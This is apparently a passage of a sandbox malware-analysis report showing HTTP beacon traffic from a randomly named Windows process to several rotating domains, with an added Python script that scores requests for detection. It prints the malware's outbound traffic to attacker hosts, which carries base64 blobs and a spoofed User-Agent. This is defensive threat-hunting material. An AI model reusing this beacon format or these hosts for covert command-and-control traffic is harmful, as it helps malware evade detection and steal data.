                                                                                                                          Oct 21, 2024 17:27:54.129630089 CEST | 427 bytes | IN | HTTP/1.1 200
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:27:53 GMT
                                                                                                                          Content-Type: application/json;charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Vary: Origin
                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Cache: MISS
                                                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 54{"msg":"请求访问：/0628/，认证失败，无法访问系统资源","code":401}0
                                                                                                                          (same 401 body as above with the terminating zero-length chunk in the same segment; the msg string reads in English: "Requested access: /0628/, authentication failed, unable to access system resources")


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          49 | 192.168.2.6 | 57363 | 94.23.162.163 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 21, 2024 17:27:59.420944929 CEST | 772 bytes | OUT | POST /9vwi/ HTTP/1.1
                                                                                                                          Host: www.productanalytics.pro
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.productanalytics.pro
                                                                                                                          Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 53 4c 58 52 73 6f 46 34 6a 65 35 4a 45 67 36 34 73 68 38 56 39 49 6d 64 6d 35 45 79 33 2f 32 42 50 36 59 78 56 5a 4f 65 34 36 38 76 5a 47 46 47 34 56 63 48 61 71 53 45 63 75 58 42 61 30 33 33 59 32 77 46 57 41 66 43 4a 44 5a 37 48 6d 36 35 78 51 2f 71 58 39 49 70 68 6a 4f 50 65 74 58 77 76 2b 61 5a 68 48 34 78 59 6c 68 55 70 34 4a 32 44 65 33 36 68 31 79 51 67 68 6b 4f 54 32 44 35 44 49 44 49 6d 43 79 75 54 54 64 68 44 4e 30 65 64 45 78 38 6d 67 36 79 4f 65 47 56 2b 7a 68 7a 4d 65 5a 4c 58 44 4c 63 39 51 73 6d 56 58 5a 63 41 57 6b 69 5a 36 63 78 6d 79 4b 5a 76 4b 43 59
                                                                                                                          Data Ascii: qFHlI=qxonD4gQFvLySLXRsoF4je5JEg64sh8V9Imdm5Ey3/2BP6YxVZOe468vZGFG4VcHaqSEcuXBa033Y2wFWAfCJDZ7Hm65xQ/qX9IphjOPetXwv+aZhH4xYlhUp4J2De36h1yQghkOT2D5DIDImCyuTTdhDN0edEx8mg6yOeGV+zhzMeZLXDLc9QsmVXZcAWkiZ6cxmyKZvKCY


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          50 | 192.168.2.6 | 57366 | 94.23.162.163 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 21, 2024 17:28:01.963342905 CEST | 796 bytes | OUT | POST /9vwi/ HTTP/1.1
                                                                                                                          Host: www.productanalytics.pro
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.productanalytics.pro
                                                                                                                          Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 54 76 54 52 75 4a 46 34 6d 2b 35 4b 64 67 36 34 6c 42 39 39 39 49 69 64 6d 37 6f 69 33 4a 65 42 4d 66 6b 78 57 64 61 65 2f 36 38 76 57 6d 45 4f 6c 46 63 4d 61 72 75 32 63 73 44 42 61 30 54 33 59 30 34 46 57 7a 33 4e 62 44 5a 39 50 47 36 33 31 51 2f 71 58 39 49 70 68 6a 4b 6c 65 70 7a 77 76 76 71 5a 75 43 4d 77 45 56 68 58 75 34 4a 32 48 65 33 2b 68 31 79 35 67 67 34 30 54 79 7a 35 44 4a 54 49 6d 51 61 74 64 6a 64 37 4d 74 31 52 4d 52 4d 7a 67 68 50 4f 4d 6f 71 66 6e 30 64 46 45 49 59 52 4c 77 4c 2f 76 41 4d 6b 56 56 42 75 41 32 6b 49 62 36 6b 78 30 6c 47 2b 67 2b 6e 37 4a 6d 4b 64 56 52 33 53 53 61 6b 72 4c 38 32 6a 43 77 46 48 75 77 3d 3d
                                                                                                                          Data Ascii: qFHlI=qxonD4gQFvLyTvTRuJF4m+5Kdg64lB999Iidm7oi3JeBMfkxWdae/68vWmEOlFcMaru2csDBa0T3Y04FWz3NbDZ9PG631Q/qX9IphjKlepzwvvqZuCMwEVhXu4J2He3+h1y5gg40Tyz5DJTImQatdjd7Mt1RMRMzghPOMoqfn0dFEIYRLwL/vAMkVVBuA2kIb6kx0lG+g+n7JmKdVR3SSakrL82jCwFHuw==


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          51 | 192.168.2.6 | 57367 | 94.23.162.163 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 21, 2024 17:28:04.518980026 CEST | 1809 bytes | OUT | POST /9vwi/ HTTP/1.1
                                                                                                                          Host: www.productanalytics.pro
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.productanalytics.pro
                                                                                                                          Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 54 76 54 52 75 4a 46 34 6d 2b 35 4b 64 67 36 34 6c 42 39 39 39 49 69 64 6d 37 6f 69 33 4a 6d 42 4d 74 63 78 56 36 32 65 2b 36 38 76 66 47 45 4e 6c 46 63 52 61 71 47 79 63 73 50 52 61 32 62 33 5a 57 41 46 51 43 33 4e 52 44 5a 39 44 6d 36 36 78 51 2f 2f 58 39 35 69 68 6a 61 6c 65 70 7a 77 76 74 79 5a 70 58 34 77 58 46 68 55 70 34 4a 36 44 65 33 47 68 31 61 49 67 67 39 57 55 42 37 35 43 6f 6a 49 71 44 79 74 66 44 64 6c 4a 74 30 4f 4d 52 4a 7a 67 68 69 33 4d 73 69 6d 6e 7a 31 46 55 4d 34 4d 4f 67 2b 6d 39 6d 59 66 4a 69 39 2b 41 32 39 6a 5a 59 6f 4a 79 33 36 51 2f 65 6a 6b 48 47 2b 42 5a 51 57 55 61 4c 49 68 46 72 4c 79 50 77 55 77 34 58 67 67 54 4f 43 36 67 4e 47 6c 6e 68 37 47 76 78 4e 77 5a 5a 71 38 74 44 7a 70 45 50 70 56 65 6b 61 54 45 72 6b 68 77 36 30 35 47 73 45 5a 4e 48 59 75 68 69 54 33 6a 44 4f 4c 53 69 45 30 6a 42 6a 34 70 7a 4f 54 46 4c 71 6b 74 48 2f 33 48 30 76 62 6e 6c 61 4c 31 5a 69 66 75 4d 37 32 4d 42 75 4d 50 7a 78 49 75 76 32 76 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=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 [TRUNCATED]


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          52 | 192.168.2.6 | 57368 | 94.23.162.163 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          Oct 21, 2024 17:28:07.066732883 CEST | 503 bytes | OUT | GET /9vwi/?qFHlI=nzAHAMVHTcHZef2dtsV+gZN2Jg+zshsJ+9OWn5ktx4T+L9EMDtm05+R8HUsMmhIjUd2KUuTNFTfuNiAYWk32clZoBW+L2SPWINxOvyiUavjXvOCviB5/F051x4xiH/bw0UeFq30=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.productanalytics.pro
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:28:07.631675005 CEST | 1236 bytes | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:07 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 7468
                                                                                                                          Last-Modified: Thu, 08 Apr 2021 14:34:06 GMT
                                                                                                                          Connection: close
                                                                                                                          ETag: "606f145e-1d2c"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 6f 64 70 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 20 70 65 6e 64 69 6e 67 20 49 43 41 4e 4e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 61 6e 64 20 69 73 20 73 75 73 70 65 6e 64 65 64 2e 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 65 79 2d 53 79 73 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp" /> <meta name="description" content="This domain has a pending ICANN verification and is suspended." /> <meta name="keywords" content="" /> <meta name="author" content="Key-Systems GmbH | CM" /> <meta name="publisher" content="Key-Systems GmbH" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/screen.css"> <link rel="shortcut icon" href="assets/img/favicon.png"> <title>Contact Verification Suspension Page</title></head><body><header><div class="overlay bright"></div><div class="container"><div class="heading"><div class="row"><
                                                                                                                          Oct 21, 2024 17:28:07.631716013 CEST | 1236 bytes | IN | Data Raw: 68 31 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 75 73 70 65 6e 64 65 64 20 64 75 65 20 74 6f 20 6e 6f 6e 2d 63 6f 6d 70 6c 65 74 69 6f 6e 20 6f 66 20 61 6e 20 49 43 41 4e 4e 2d 6d 61 6e 64 61 74 65 64 20 63 6f 6e 74 61
                                                                                                                          Data Ascii: h1>This domain has been suspended due to non-completion of an ICANN-mandated contact verification.</h1><p>As part of the ongoing effort to improve contact quality, the Internet Corporation for Assigned Names and Numbers (ICANN) requires
                                                                                                                          Oct 21, 2024 17:28:07.631732941 CEST | 1236 bytes | IN | Data Raw: 6f 6d 61 69 6e 20 72 65 67 69 73 74 72 61 6e 74 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 6f 72 20 63 68 61 6e 67 65 64 20 62 75 74 20 6e 6f 74 20 76 65 72 69 66 69 65 64 20 79 65 74 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 0d 0a 09 09
                                                                                                                          Data Ascii: omain registrant has been modified or changed but not verified yet.</span><br>Changing the email address of the domain registrant requires a verification.</li><li><i class="fa fa-play"></i><span class="bold">The domain has recent
                                                                                                                          Oct 21, 2024 17:28:07.631942987 CEST | 1236 bytes | IN | Data Raw: 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 5f 6c 65 66 74 22 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09
                                                                                                                          Data Ascii: v class="icon_left"><span class="fa fa-check-circle"></span></div><div class="slice_content"><p><span class="bold">Click the link provided in the verification email sent to you by your Registrar or direct service provide
                                                                                                                          Oct 21, 2024 17:28:07.631963015 CEST | 848 bytes | IN | Data Raw: 72 2c 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 70 72 6f 76 69 64 65 72 20 6d 69 67 68 74 20 70 72 6f 76 69 64 65 20 74 68 65 20 72 65 73 70 65 63 74 69 76 65 20 74 72 69 67 67 65 72 20 63 6f 64 65 20 75 6e 64 65 72 20 63 65 72 74 61 69 6e 20 63 6f
                                                                                                                          Data Ascii: r, your domain provider might provide the respective trigger code under certain conditions. This trigger code can be entered on <a href="http://emailverification.info/">http://emailverification.info/</a> to verify your registrant contact data
                                                                                                                          Oct 21, 2024 17:28:07.631978989 CEST | 1236 bytes | IN | Data Raw: 65 72 69 66 79 20 72 65 67 69 73 74 72 61 6e 74 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 65 73 20 61 6e 64 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 69 74 68 69 6e 20 31 35 20 64 61 79 73 20 61 66 74 65 72 20 72 65 67 69
                                                                                                                          Data Ascii: erify registrant email addresses and contact information within 15 days after registration and incoming transfers. If registrant data is not verified in time, ICANN mandates registrars to suspend the corresponding website of the affected domai
                                                                                                                          Oct 21, 2024 17:28:07.631994009 CEST | 684 bytes | IN | Data Raw: 6c 61 73 73 3d 22 62 6f 6c 64 22 3e 48 6f 77 20 6c 6f 6e 67 20 64 6f 65 73 20 69 74 20 74 61 6b 65 20 75 6e 74 69 6c 20 6d 79 20 77 65 62 73 69 74 65 20 63 6f 6d 65 73 20 62 61 63 6b 20 6f 6e 6c 69 6e 65 20 61 66 74 65 72 20 74 68 65 20 73 75 73
                                                                                                                          Data Ascii: lass="bold">How long does it take until my website comes back online after the suspension is removed?</span><br>After the verification has been successfully completed the suspension is removed within 30 minutes. Please keep in mind that

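The requests in sessions 47 to 53 share a small set of traits that are worth turning into a hunt: one fixed Android/Chrome 45 User-Agent sent by a Windows process, Connection: close on every request, an Accept header that advertises image/avif (which Chrome 45 never sent), a form-encoded POST whose only field is an unescaped base64 blob, a GET that carries the same field name plus a second parameter, and the same parameter name and the same DJ value reused against three unrelated domains. The script below is an added example for this report, not Joe Sandbox output and not code from the sample. It parses raw requests of the shape captured here and scores them trait by trait. The User-Agent string, the parameter names qFHlI and DJ, and the three beacon requests are copied from sessions 47, 49 and 53 above; the benign control request, the trait list, the summing of traits into a score and the helper names are this example's own assumptions.

```python
"""Added triage helper, not part of the Joe Sandbox report or of the sample.
Scores raw HTTP requests against the traits visible in the capture above."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# User-Agent copied verbatim from the captured requests.
BEACON_UA = ("Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) "
             "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+=*$")   # plain base64 alphabet, no %XX escapes


@dataclass
class HttpRequest:
    method: str
    path: str                     # request-target without the query string
    query: List[Tuple[str, str]]  # raw name/value pairs, left undecoded
    headers: Dict[str, str]       # names lower-cased
    body: str


def split_pairs(s: str) -> List[Tuple[str, str]]:
    """Split 'a=1&b=2' WITHOUT the '+'->space or %XX decoding a form parser
    would apply, so the raw base64 alphabet survives for the checks below."""
    out = []
    for part in s.split("&"):
        if part:
            name, _, value = part.partition("=")
            out.append((name, value))
    return out


def parse_request(raw: str) -> HttpRequest:
    """Parse one raw HTTP/1.1 request with CRLF line endings."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, qs = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, split_pairs(qs), headers, body)


def request_traits(req: HttpRequest) -> Dict[str, bool]:
    """One boolean per trait the capture exhibits; the caller sums them."""
    h = req.headers
    host, ua = h.get("host", ""), h.get("user-agent", "")
    t = {
        "fixed_android_ua": ua == BEACON_UA,
        # image/avif entered Chrome's Accept header years after Chrome 45, so
        # this Accept line cannot have been produced by the browser the UA claims.
        "accept_newer_than_ua": "image/avif" in h.get("accept", "") and "Chrome/45." in ua,
        "connection_close": h.get("connection", "").lower() == "close",
        # Origin equal to the contacted host and Referer equal to the URL being
        # posted to: the client vouches for itself instead of a real page.
        "self_referential_origin": h.get("origin") == f"http://{host}"
                                   and h.get("referer") == f"http://{host}{req.path}",
    }
    if req.method == "POST":
        pairs = split_pairs(req.body)
        t["single_b64_form_field"] = (h.get("content-type") == "application/x-www-form-urlencoded"
                                      and len(pairs) == 1 and B64_RE.match(pairs[0][1]) is not None)
        # A real form encoder escapes '+' and '/' as %2B and %2F; raw ones did not come from a form.
        t["unescaped_form_body"] = any(c in req.body for c in "+/")
    else:
        t["b64_query_pair"] = len(req.query) == 2 and all(B64_RE.match(v) for _, v in req.query)
    return t


def beacon_score(req: HttpRequest) -> int:
    return sum(request_traits(req).values())


def _pairs_of(r: HttpRequest) -> List[Tuple[str, str]]:
    return r.query if r.method == "GET" else split_pairs(r.body)


def shared_param_names(reqs: List[HttpRequest], min_hosts: int = 2) -> Set[str]:
    """Parameter names that recur across at least min_hosts distinct hosts. A
    random-looking name reused on unrelated domains is what links the sessions."""
    hosts_by_name: Dict[str, Set[str]] = {}
    for r in reqs:
        for name, _ in _pairs_of(r):
            hosts_by_name.setdefault(name, set()).add(r.headers.get("host", ""))
    return {n for n, hosts in hosts_by_name.items() if len(hosts) >= min_hosts}


def param_values(reqs: List[HttpRequest], name: str) -> Set[str]:
    """Distinct values sent under one parameter name; a constant behaves like a client ID."""
    return {v for r in reqs for n, v in _pairs_of(r) if n == name}


def build(method: str, host: str, target: str, ua: str, extra: str = "", body: str = "") -> str:
    """Assemble a raw request; used only to construct the samples below."""
    return (f"{method} {target} HTTP/1.1\r\nHost: {host}\r\n"
            "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
            f"Accept-Language: en-US,en\r\n{extra}User-Agent: {ua}\r\n\r\n{body}")


# Bodies and query strings copied from sessions 49, 48 and 53 above.
POST_BODY = "qFHlI=qxonD4gQFvLySLXRsoF4je5JEg64sh8V9Imdm5Ey3/2BP6YxVZOe468vZGFG4VcHaqSEcuXBa033Y2wFWAfCJDZ7Hm65xQ/qX9IphjOPetXwv+aZhH4xYlhUp4J2De36h1yQghkOT2D5DIDImCyuTTdhDN0edEx8mg6yOeGV+zhzMeZLXDLc9QsmVXZcAWkiZ6cxmyKZvKCY"
SAMPLE_POST = build("POST", "www.productanalytics.pro", "/9vwi/", BEACON_UA,
                    "Origin: http://www.productanalytics.pro\r\nReferer: http://www.productanalytics.pro/9vwi/\r\n"
                    f"Content-Length: {len(POST_BODY)}\r\nContent-Type: application/x-www-form-urlencoded\r\n"
                    "Connection: close\r\n", POST_BODY)
SAMPLE_GET_A = build("GET", "www.djazdgc.tokyo", "/0628/?qFHlI=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+FigCVrQtCrgnSlgUA2JT078+MxZtZD+kFHsD8UJb6CndygVk2Aw=&DJ=uNx48jdPyvmhqtM0", BEACON_UA, "Connection: close\r\n")
SAMPLE_GET_B = build("GET", "www.itemsort.shop", "/qw71/?qFHlI=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxCl1maFN4do860hmE4XwK9H8rJm4CQQIXjRIUyqXGbNbQLu85qd4=&DJ=uNx48jdPyvmhqtM0", BEACON_UA, "Connection: close\r\n")
# Constructed benign control (assumption): a current Windows Chrome fetching a search page.
SAMPLE_BENIGN = build("GET", "www.example.com", "/search?q=weather",
                      "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36",
                      "Connection: keep-alive\r\n")
REQUESTS = [parse_request(s) for s in (SAMPLE_POST, SAMPLE_GET_A, SAMPLE_GET_B, SAMPLE_BENIGN)]

if __name__ == "__main__":
    for r in REQUESTS:
        print(f"{r.headers['host']:26} {r.method:4} score={beacon_score(r)} {request_traits(r)}")
    print("names shared across hosts:", shared_param_names(REQUESTS), "DJ values:", param_values(REQUESTS, "DJ"))
```

Run as-is, the three copied requests score 6, 4 and 4 while the control scores 0, and the cross-host check reports qFHlI and DJ as the names reused on unrelated domains with a single DJ value. That reuse is the most durable signal in this capture: it survives the domain rotation seen across sessions 47 to 53, whereas the User-Agent and header order are trivially changed by the operator. The script does not try to decode the qFHlI payloads, because nothing on this page establishes how they are encrypted. Note also that none of the three contacted hosts answered with anything but an error or a registrar parking page (a 401 JSON body from www.djazdgc.tokyo, an ICANN suspension page from www.productanalytics.pro, a 404 from www.itemsort.shop), so this capture alone does not identify which host, if any, is the live server.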

                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                          53 | 192.168.2.6 | 57369 | 188.114.96.3 | 80
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:28:24.690052986 CEST496OUTGET /qw71/?qFHlI=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxCl1maFN4do860hmE4XwK9H8rJm4CQQIXjRIUyqXGbNbQLu85qd4=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.itemsort.shop
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:28:25.255880117 CEST936INHTTP/1.1 404
                                                                                                                          Date: Mon, 21 Oct 2024 15:28:25 GMT
                                                                                                                          Content-Type: text/html;charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axVSyJ9Q8U%2BlMJpXnu1AQ%2BHAGMK5kofukqB4TSWi6uu89vBe9qC0z3AfbZTrR5P3c2fzbpD5YWHu%2B3uJwBysI%2FMD1zUMpac21yZ38CdiNPO8IfooDyu%2Bcr%2FIF%2F4YjA%2FE72Uytw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6246fc989a42b7-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=496&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>0


Session ID: 54
Source IP: 192.168.2.6
Source Port: 57370
Destination IP: 52.13.151.179
Destination Port: 80

Timestamp: Oct 21, 2024 17:28:30.283085108 CEST
Bytes transferred: 760
Direction: OUT
Data:
POST /t7t4/ HTTP/1.1
Host: www.rudemyvague.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.rudemyvague.info
Referer: http://www.rudemyvague.info/t7t4/
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Raw: (hex dump omitted; decoded body follows)
Data Ascii: qFHlI=EOsfGuNEzgm/VnoB7q+S5zZeb/0PhMZa8OjWvCetvFIbftOmOmr7QQ/OpfV9NdIaPVU9Q5c5pnSmZJ7co/mXNXqeaCirjT2gd+s9HQpqr6d9ran+RGBX7VVi/uudb3B7l40L0QRQ0+oHwPYliEyy+4AY8MmJLFASckS+Epi0PPW5Y0ApVdA/LXY5o/InBGF0SCAc+QNBVrOQ

Timestamp: Oct 21, 2024 17:28:30.849168062 CEST
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 21 Oct 2024 15:28:30 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
